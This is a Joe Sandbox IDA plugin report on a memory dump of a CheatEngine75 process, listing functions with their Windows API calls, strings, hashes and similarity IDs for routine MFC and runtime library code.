
Memory Dump Source

Source File: 00000008.00000002.3448503678.000000006B4C1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6B4C0000, based on PE: true

Associated: 00000008.00000002.3448462024.000000006B4C0000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3457392843.000000006B638000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459542671.000000006B68D000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459603967.000000006B68F000.00000008.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459696728.000000006B692000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459742082.000000006B694000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459833250.000000006B698000.00000002.00000001.01000000.00000013.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6b4c0000_CheatEngine75.jbxd

Similarity

API ID: Create$Compatible$BitmapFillH_prolog3H_prolog3_ObjectRectSectionSelectWindow
String ID: (
API String ID: 2680359821-3887548279
Opcode ID: 02644a66e83cde05aa45fa26ae1bf0175cea0520750f10c6c05f5abb97330f49
Instruction ID: 5e07da971ee183086481d3e59416cf2106c83932dc7c3912da6d86f935de1785
Opcode Fuzzy Hash: 02644a66e83cde05aa45fa26ae1bf0175cea0520750f10c6c05f5abb97330f49
Instruction Fuzzy Hash: 055103B1D10218ABEF14CFA5C886BAEBBB9FF44305F10812EE415AB290DB789945CF50

Function 6B547858 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 95keyboardCOMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 6B54785F
GetKeyboardLayout.USER32(00000000), ref: 6B54789C
MapVirtualKeyExW.USER32(?,00000000,00000000), ref: 6B5478A5
GetKeyNameTextW.USER32(00000000,?,00000032), ref: 6B5478CC
IsCharLowerW.USER32(?,?,00000000), ref: 6B547909

Strings

Pause, xrefs: 6B54787C, 6B547881, 6B547889

Memory Dump Source

Source File: 00000008.00000002.3448503678.000000006B4C1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6B4C0000, based on PE: true

Associated: 00000008.00000002.3448462024.000000006B4C0000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3457392843.000000006B638000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459542671.000000006B68D000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459603967.000000006B68F000.00000008.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459696728.000000006B692000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459742082.000000006B694000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459833250.000000006B698000.00000002.00000001.01000000.00000013.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6b4c0000_CheatEngine75.jbxd

Similarity

API ID: CharH_prolog3_KeyboardLayoutLowerNameTextVirtual
String ID: Pause
API String ID: 2563161834-375111145
Opcode ID: 577113484ddbfc6c9fe233f4a3803dfabde9980c998b9cc55ff96401d49211d6
Instruction ID: f77f4e481ef2e5030b95591849c4e9917b68dcf1417eeb104c4023abb7d0a542
Opcode Fuzzy Hash: 577113484ddbfc6c9fe233f4a3803dfabde9980c998b9cc55ff96401d49211d6
Instruction Fuzzy Hash: ED319172C00118AAFB25DBB5C845EEEB778EF89704F10446EE461A7081DF78AA45DBA1

Function 6B500B4E Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 66COMMON

Download Yara Rule

APIs

SelectObject.GDI32(?,00000000), ref: 6B500B6C

Part of subcall function 6B4D957B: DeleteObject.GDI32(?), ref: 6B4D958D

SelectObject.GDI32(?,00000000), ref: 6B500B81
DeleteObject.GDI32(00000000), ref: 6B500BE7
DeleteDC.GDI32(00000000), ref: 6B500BF6
LeaveCriticalSection.KERNEL32(6B694B00), ref: 6B500C0D

Strings

(6dk, xrefs: 6B500B55

Memory Dump Source

Source File: 00000008.00000002.3448503678.000000006B4C1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6B4C0000, based on PE: true

Associated: 00000008.00000002.3448462024.000000006B4C0000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3457392843.000000006B638000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459542671.000000006B68D000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459603967.000000006B68F000.00000008.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459696728.000000006B692000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459742082.000000006B694000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459833250.000000006B698000.00000002.00000001.01000000.00000013.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6b4c0000_CheatEngine75.jbxd

Similarity

API ID: Object$Delete$Select$CriticalLeaveSection
String ID: (6dk
API String ID: 3849354926-3218462620
Opcode ID: bd5060874330287456a137c07f2ac4975cc639032389560d8f40e12b820dfc50
Instruction ID: 4d59913631d3e6313d7738d35c0cb9ae4dbe75daa9e7575569dfbaebdb1815e7
Opcode Fuzzy Hash: bd5060874330287456a137c07f2ac4975cc639032389560d8f40e12b820dfc50
Instruction Fuzzy Hash: 2B210831900204DFDF10EF65C988BD9BBB5FF02315F1441AAEA249A065CBB5D981CF50

Function 6B4C9822 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 61COMMON

Download Yara Rule

APIs

IsWindow.USER32(00000000), ref: 6B4C9839
FindResourceW.KERNEL32(?,00000000,AFX_DIALOG_LAYOUT), ref: 6B4C9861
SizeofResource.KERNEL32(?,00000000), ref: 6B4C9873
LoadResource.KERNEL32(?,00000000), ref: 6B4C987F
LockResource.KERNEL32(00000000), ref: 6B4C988A

Strings

AFX_DIALOG_LAYOUT, xrefs: 6B4C9852

Memory Dump Source

Source File: 00000008.00000002.3448503678.000000006B4C1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6B4C0000, based on PE: true

Associated: 00000008.00000002.3448462024.000000006B4C0000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3457392843.000000006B638000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459542671.000000006B68D000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459603967.000000006B68F000.00000008.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459696728.000000006B692000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459742082.000000006B694000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459833250.000000006B698000.00000002.00000001.01000000.00000013.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6b4c0000_CheatEngine75.jbxd

Similarity

API ID: Resource$FindLoadLockSizeofWindow
String ID: AFX_DIALOG_LAYOUT
API String ID: 2582447065-2436846380
Opcode ID: 6226e2ad48d5b0b889122ef76fef493e93420c0c9e6f136d42dac63f69775ff7
Instruction ID: 7f4be3f6c4af63e6e50b51158f4561be69f9f12434975db8a85746d255cc6db4
Opcode Fuzzy Hash: 6226e2ad48d5b0b889122ef76fef493e93420c0c9e6f136d42dac63f69775ff7
Instruction Fuzzy Hash: E5118E76620204BBEF125B75CC48EAB76ADEF85A58B004479E901D3313EB7AC901C776

Function 6B4E08E2 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 50libraryfileloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(kernel32.dll), ref: 6B4E08F5
GetProcAddress.KERNEL32(00000000,CreateFileTransactedW), ref: 6B4E0905
CreateFileW.KERNEL32(?,?,?,?,?,?,00000000), ref: 6B4E094E

Strings

CreateFileTransactedW, xrefs: 6B4E08FF
kernel32.dll, xrefs: 6B4E08F0
0#Lk, xrefs: 6B4E092C

Memory Dump Source

Source File: 00000008.00000002.3448503678.000000006B4C1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6B4C0000, based on PE: true

Associated: 00000008.00000002.3448462024.000000006B4C0000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3457392843.000000006B638000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459542671.000000006B68D000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459603967.000000006B68F000.00000008.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459696728.000000006B692000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459742082.000000006B694000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459833250.000000006B698000.00000002.00000001.01000000.00000013.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6b4c0000_CheatEngine75.jbxd

Similarity

API ID: AddressCreateFileHandleModuleProc
String ID: 0#Lk$CreateFileTransactedW$kernel32.dll
API String ID: 2580138172-3665884053
Opcode ID: b0ce430f6e954f744d98fc8b97a1205fd7f7c00eb2528ebcf53ed6efc4a63d17
Instruction ID: e65c483a02cc7e391b7ebbbee45ece6042073c3a2cc5e78ae97dd8b73849bb89
Opcode Fuzzy Hash: b0ce430f6e954f744d98fc8b97a1205fd7f7c00eb2528ebcf53ed6efc4a63d17
Instruction Fuzzy Hash: 9301E93240010AFFEF125E95CC45CAB7F7AFB492917005129FA2492260CB36C862EB70

Function 6B5018F9 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 43COMMON

Download Yara Rule

APIs

FindResourceW.KERNEL32(00000000,?,PNG,?,?,?,86dk,?,6B50278D,?,00000000,?), ref: 6B50191B
LoadResource.KERNEL32(00000000,00000000,?,86dk,?,6B50278D,?,00000000,?), ref: 6B501929
LockResource.KERNEL32(00000000,?,86dk,?,6B50278D,?,00000000,?), ref: 6B501934
SizeofResource.KERNEL32(00000000,00000000,?,86dk,?,6B50278D,?,00000000,?), ref: 6B501942

Strings

86dk, xrefs: 6B5018FC
PNG, xrefs: 6B501912

Memory Dump Source

Source File: 00000008.00000002.3448503678.000000006B4C1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6B4C0000, based on PE: true

Associated: 00000008.00000002.3448462024.000000006B4C0000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3457392843.000000006B638000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459542671.000000006B68D000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459603967.000000006B68F000.00000008.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459696728.000000006B692000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459742082.000000006B694000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459833250.000000006B698000.00000002.00000001.01000000.00000013.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6b4c0000_CheatEngine75.jbxd

Similarity

API ID: Resource$FindLoadLockSizeof
String ID: 86dk$PNG
API String ID: 3473537107-1083223224
Opcode ID: 3c8c33329e1cfa1344ba1f8be5d34ddfeca68a36a53149f2776393cca7df7d0c
Instruction ID: cc93eb81c1526d1a8a5e1520f22d99d042e88745ae802ea7d1c3bdcb44bedccc
Opcode Fuzzy Hash: 3c8c33329e1cfa1344ba1f8be5d34ddfeca68a36a53149f2776393cca7df7d0c
Instruction Fuzzy Hash: 5AF06277501622BBAB516FA58808EEB776CDF866583004465F905E3201DE78D9048BB6

Function 6B4D89B4 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 37libraryloaderCOMMON

Download Yara Rule

APIs

DecodePointer.KERNEL32(00000000), ref: 6B4D89ED

Part of subcall function 6B4C80F6: GetModuleHandleW.KERNEL32(kernel32.dll,?,00000000), ref: 6B4C811C
Part of subcall function 6B4C80F6: GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 6B4C812C
Part of subcall function 6B4C80F6: EncodePointer.KERNEL32(00000000,?,00000000), ref: 6B4C8135

GetProcAddress.KERNEL32(00000000,DwmDefWindowProc), ref: 6B4D89D6
EncodePointer.KERNEL32(00000000), ref: 6B4D89DF

Strings

DwmDefWindowProc, xrefs: 6B4D89D0
dwmapi.dll, xrefs: 6B4D89C1
0#Lk, xrefs: 6B4D8A0A

Memory Dump Source

Source File: 00000008.00000002.3448503678.000000006B4C1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6B4C0000, based on PE: true

Associated: 00000008.00000002.3448462024.000000006B4C0000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3457392843.000000006B638000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459542671.000000006B68D000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459603967.000000006B68F000.00000008.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459696728.000000006B692000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459742082.000000006B694000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459833250.000000006B698000.00000002.00000001.01000000.00000013.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6b4c0000_CheatEngine75.jbxd

Similarity

API ID: Pointer$AddressEncodeProc$DecodeHandleModule
String ID: 0#Lk$DwmDefWindowProc$dwmapi.dll
API String ID: 1102202064-1998123538
Opcode ID: 67f8185a91a14c44b9d19e92cafe8e2a8128519b3200b9bf8f3af7fd07538022
Instruction ID: 7c0acebc26fd52d6dd69bed4532ddaba38580f72430abb96df6396a72124bdf9
Opcode Fuzzy Hash: 67f8185a91a14c44b9d19e92cafe8e2a8128519b3200b9bf8f3af7fd07538022
Instruction Fuzzy Hash: 7EF03676505227ABDF216FA5DC14CAB7FA9DB066507005151FD11E2711DB38C82287E1

Function 6B4D8B9B Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36libraryloaderCOMMON

Download Yara Rule

APIs

DecodePointer.KERNEL32(00000000), ref: 6B4D8BD4

Part of subcall function 6B4C80F6: GetModuleHandleW.KERNEL32(kernel32.dll,?,00000000), ref: 6B4C811C
Part of subcall function 6B4C80F6: GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 6B4C812C
Part of subcall function 6B4C80F6: EncodePointer.KERNEL32(00000000,?,00000000), ref: 6B4C8135

GetProcAddress.KERNEL32(00000000,DwmSetWindowAttribute), ref: 6B4D8BBD
EncodePointer.KERNEL32(00000000), ref: 6B4D8BC6

Strings

dwmapi.dll, xrefs: 6B4D8BA8
DwmSetWindowAttribute, xrefs: 6B4D8BB7
0#Lk, xrefs: 6B4D8BEE

Memory Dump Source

Source File: 00000008.00000002.3448503678.000000006B4C1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6B4C0000, based on PE: true

Associated: 00000008.00000002.3448462024.000000006B4C0000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3457392843.000000006B638000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459542671.000000006B68D000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459603967.000000006B68F000.00000008.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459696728.000000006B692000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459742082.000000006B694000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459833250.000000006B698000.00000002.00000001.01000000.00000013.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6b4c0000_CheatEngine75.jbxd

Similarity

API ID: Pointer$AddressEncodeProc$DecodeHandleModule
String ID: 0#Lk$DwmSetWindowAttribute$dwmapi.dll
API String ID: 1102202064-93843945
Opcode ID: dc946be5cd96071acee4c0a65d70c1dbdf1b1ec1cf851f40949f652128f57ed6
Instruction ID: 6aa95b9ef27771b1b775dc65e3ea0dccbd2f7d6bd1fe9b8d2b53fc0d4b106f5d
Opcode Fuzzy Hash: dc946be5cd96071acee4c0a65d70c1dbdf1b1ec1cf851f40949f652128f57ed6
Instruction Fuzzy Hash: 29F0BBB6440627BFCF212FA6CC24CAB7B94DF066517005112FD15D6711DB39C8114BA4

Function 6B4D8AD4 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36libraryloaderCOMMON

Download Yara Rule

APIs

DecodePointer.KERNEL32(00000000), ref: 6B4D8B0D

Part of subcall function 6B4C80F6: GetModuleHandleW.KERNEL32(kernel32.dll,?,00000000), ref: 6B4C811C
Part of subcall function 6B4C80F6: GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 6B4C812C
Part of subcall function 6B4C80F6: EncodePointer.KERNEL32(00000000,?,00000000), ref: 6B4C8135

GetProcAddress.KERNEL32(00000000,DwmSetIconicLivePreviewBitmap), ref: 6B4D8AF6
EncodePointer.KERNEL32(00000000), ref: 6B4D8AFF

Strings

dwmapi.dll, xrefs: 6B4D8AE1
DwmSetIconicLivePreviewBitmap, xrefs: 6B4D8AF0
0#Lk, xrefs: 6B4D8B27

Memory Dump Source

Source File: 00000008.00000002.3448503678.000000006B4C1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6B4C0000, based on PE: true

Associated: 00000008.00000002.3448462024.000000006B4C0000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3457392843.000000006B638000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459542671.000000006B68D000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459603967.000000006B68F000.00000008.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459696728.000000006B692000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459742082.000000006B694000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459833250.000000006B698000.00000002.00000001.01000000.00000013.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6b4c0000_CheatEngine75.jbxd

Similarity

API ID: Pointer$AddressEncodeProc$DecodeHandleModule
String ID: 0#Lk$DwmSetIconicLivePreviewBitmap$dwmapi.dll
API String ID: 1102202064-2569324188
Opcode ID: 476c3bb0f183bd8a9d6df8a809189579fbcdfd4966fb3e5e3d207207bd0f3ddc
Instruction ID: 03ceaa24580de7a31a7c6208e7c22c34029b47a6acffdcbddc2b9695302e1f31
Opcode Fuzzy Hash: 476c3bb0f183bd8a9d6df8a809189579fbcdfd4966fb3e5e3d207207bd0f3ddc
Instruction Fuzzy Hash: D8F054B6500626ABDF216FA69C18CAF7BA8DF077907016255FD15E7324DB38C8128BA0

Function 6B4D8B39 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 35libraryloaderCOMMON

Download Yara Rule

APIs

DecodePointer.KERNEL32(00000000), ref: 6B4D8B72

Part of subcall function 6B4C80F6: GetModuleHandleW.KERNEL32(kernel32.dll,?,00000000), ref: 6B4C811C
Part of subcall function 6B4C80F6: GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 6B4C812C
Part of subcall function 6B4C80F6: EncodePointer.KERNEL32(00000000,?,00000000), ref: 6B4C8135

GetProcAddress.KERNEL32(00000000,DwmSetIconicThumbnail), ref: 6B4D8B5B
EncodePointer.KERNEL32(00000000), ref: 6B4D8B64

Strings

DwmSetIconicThumbnail, xrefs: 6B4D8B55
dwmapi.dll, xrefs: 6B4D8B46
0#Lk, xrefs: 6B4D8B89

Memory Dump Source

Source File: 00000008.00000002.3448503678.000000006B4C1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6B4C0000, based on PE: true

Associated: 00000008.00000002.3448462024.000000006B4C0000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3457392843.000000006B638000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459542671.000000006B68D000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459603967.000000006B68F000.00000008.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459696728.000000006B692000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459742082.000000006B694000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459833250.000000006B698000.00000002.00000001.01000000.00000013.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6b4c0000_CheatEngine75.jbxd

Similarity

API ID: Pointer$AddressEncodeProc$DecodeHandleModule
String ID: 0#Lk$DwmSetIconicThumbnail$dwmapi.dll
API String ID: 1102202064-911071052
Opcode ID: 61aeba7f813b9590bd80e24ff81ec13a3ce78529c09f81f384715a93c2242d75
Instruction ID: a0a56a5cc6845ee92fbce3eea1fa22aba2d814c000d61d9c98253e6dd80985b4
Opcode Fuzzy Hash: 61aeba7f813b9590bd80e24ff81ec13a3ce78529c09f81f384715a93c2242d75
Instruction Fuzzy Hash: BCF054B5500726ABDF213E7ADC18DAA7B98AB076903006165FD15E6320DB38C80247A0

Function 6B4D8A75 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 35libraryloaderCOMMON

Download Yara Rule

APIs

DecodePointer.KERNEL32(00000000), ref: 6B4D8AAE

Part of subcall function 6B4C80F6: GetModuleHandleW.KERNEL32(kernel32.dll,?,00000000), ref: 6B4C811C
Part of subcall function 6B4C80F6: GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 6B4C812C
Part of subcall function 6B4C80F6: EncodePointer.KERNEL32(00000000,?,00000000), ref: 6B4C8135

GetProcAddress.KERNEL32(00000000,DwmIsCompositionEnabled), ref: 6B4D8A97
EncodePointer.KERNEL32(00000000), ref: 6B4D8AA0

Strings

DwmIsCompositionEnabled, xrefs: 6B4D8A91
dwmapi.dll, xrefs: 6B4D8A82
0#Lk, xrefs: 6B4D8ABF

Memory Dump Source

Source File: 00000008.00000002.3448503678.000000006B4C1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6B4C0000, based on PE: true

Associated: 00000008.00000002.3448462024.000000006B4C0000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3457392843.000000006B638000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459542671.000000006B68D000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459603967.000000006B68F000.00000008.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459696728.000000006B692000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459742082.000000006B694000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459833250.000000006B698000.00000002.00000001.01000000.00000013.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6b4c0000_CheatEngine75.jbxd

Similarity

API ID: Pointer$AddressEncodeProc$DecodeHandleModule
String ID: 0#Lk$DwmIsCompositionEnabled$dwmapi.dll
API String ID: 1102202064-3884341049
Opcode ID: 09a7e0ae6645c519519ea5dcc991717a5795bf71eb23e0ba880c5bec14102f0d
Instruction ID: 5f3cc8a682e664f2ba54078a33d1394fad3bba8c16876756bd1ec14b6e4a97ca
Opcode Fuzzy Hash: 09a7e0ae6645c519519ea5dcc991717a5795bf71eb23e0ba880c5bec14102f0d
Instruction Fuzzy Hash: 84F0BE39500226ABDB21ABBAC818EAA7798DB066907016152FC11E7304DB38C80247E0

Function 6B4D8A19 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 33libraryloaderCOMMON

Download Yara Rule

APIs

DecodePointer.KERNEL32(00000000), ref: 6B4D8A52

Part of subcall function 6B4C80F6: GetModuleHandleW.KERNEL32(kernel32.dll,?,00000000), ref: 6B4C811C
Part of subcall function 6B4C80F6: GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 6B4C812C
Part of subcall function 6B4C80F6: EncodePointer.KERNEL32(00000000,?,00000000), ref: 6B4C8135

GetProcAddress.KERNEL32(00000000,DwmInvalidateIconicBitmaps), ref: 6B4D8A3B
EncodePointer.KERNEL32(00000000), ref: 6B4D8A44

Strings

dwmapi.dll, xrefs: 6B4D8A26
0#Lk, xrefs: 6B4D8A63
DwmInvalidateIconicBitmaps, xrefs: 6B4D8A35

Memory Dump Source

Source File: 00000008.00000002.3448503678.000000006B4C1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6B4C0000, based on PE: true

Associated: 00000008.00000002.3448462024.000000006B4C0000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3457392843.000000006B638000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459542671.000000006B68D000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459603967.000000006B68F000.00000008.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459696728.000000006B692000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459742082.000000006B694000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459833250.000000006B698000.00000002.00000001.01000000.00000013.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6b4c0000_CheatEngine75.jbxd

Similarity

API ID: Pointer$AddressEncodeProc$DecodeHandleModule
String ID: 0#Lk$DwmInvalidateIconicBitmaps$dwmapi.dll
API String ID: 1102202064-2513213730
Opcode ID: 1044d51f7c6d28888a4e41a8f1d13d54e31de418560a11c228b02ede7816c1df
Instruction ID: 8d5229446e241a5fecbf39380ce265b4c75707b70e88667d7c975f3eeb60553f
Opcode Fuzzy Hash: 1044d51f7c6d28888a4e41a8f1d13d54e31de418560a11c228b02ede7816c1df
Instruction Fuzzy Hash: C9F0A7765416269BDF217B7A8818CBA77989B066913006152FD05E7310DB3CC80247E0

Function 6B4EDAFC Relevance: 9.1, APIs: 6, Instructions: 86keyboardwindowCOMMON

Download Yara Rule

APIs

GetParent.USER32(?), ref: 6B4EDB31
GetKeyState.USER32(00000012), ref: 6B4EDB5F
GetKeyState.USER32(00000011), ref: 6B4EDB70
SendMessageW.USER32(?,00000157,00000000,00000000), ref: 6B4EDB85
SendMessageW.USER32(?,0000014F,00000001,00000000), ref: 6B4EDB9A
GetNextDlgTabItem.USER32(?,?,00000000), ref: 6B4EDBD9

Memory Dump Source

Source File: 00000008.00000002.3448503678.000000006B4C1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6B4C0000, based on PE: true

Associated: 00000008.00000002.3448462024.000000006B4C0000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3457392843.000000006B638000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459542671.000000006B68D000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459603967.000000006B68F000.00000008.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459696728.000000006B692000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459742082.000000006B694000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459833250.000000006B698000.00000002.00000001.01000000.00000013.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6b4c0000_CheatEngine75.jbxd

Similarity

API ID: MessageSendState$ItemNextParent
String ID:
API String ID: 1930099164-0
Opcode ID: a1dd8a6d6dabe4b0a9c295a2955a81ec37974396e3921f47d6f873c7312672cf
Instruction ID: 0f8a5932e6dc1adcc9ef619fb9b626446dc6da5bbea810bd0a01119a251dc8b1
Opcode Fuzzy Hash: a1dd8a6d6dabe4b0a9c295a2955a81ec37974396e3921f47d6f873c7312672cf
Instruction Fuzzy Hash: 3F21C431784205AFEF183E358D45E6A377DFB82786B00046DF556C62A0EF68DD0287B1

Function 6B604960 Relevance: 9.1, APIs: 6, Instructions: 60COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(00000001,?,6B604854,6B600656,6B6008F5,?,6B600B2D,?,00000001,?,?,00000001,?,6B688D58,0000000C,6B600C26), ref: 6B60496E
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 6B60497C
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 6B604995
SetLastError.KERNEL32(00000000,6B600B2D,?,00000001,?,?,00000001,?,6B688D58,0000000C,6B600C26,?,00000001,?), ref: 6B6049E7

Memory Dump Source

Source File: 00000008.00000002.3448503678.000000006B4C1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6B4C0000, based on PE: true

Associated: 00000008.00000002.3448462024.000000006B4C0000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3457392843.000000006B638000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459542671.000000006B68D000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459603967.000000006B68F000.00000008.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459696728.000000006B692000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459742082.000000006B694000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459833250.000000006B698000.00000002.00000001.01000000.00000013.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6b4c0000_CheatEngine75.jbxd

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
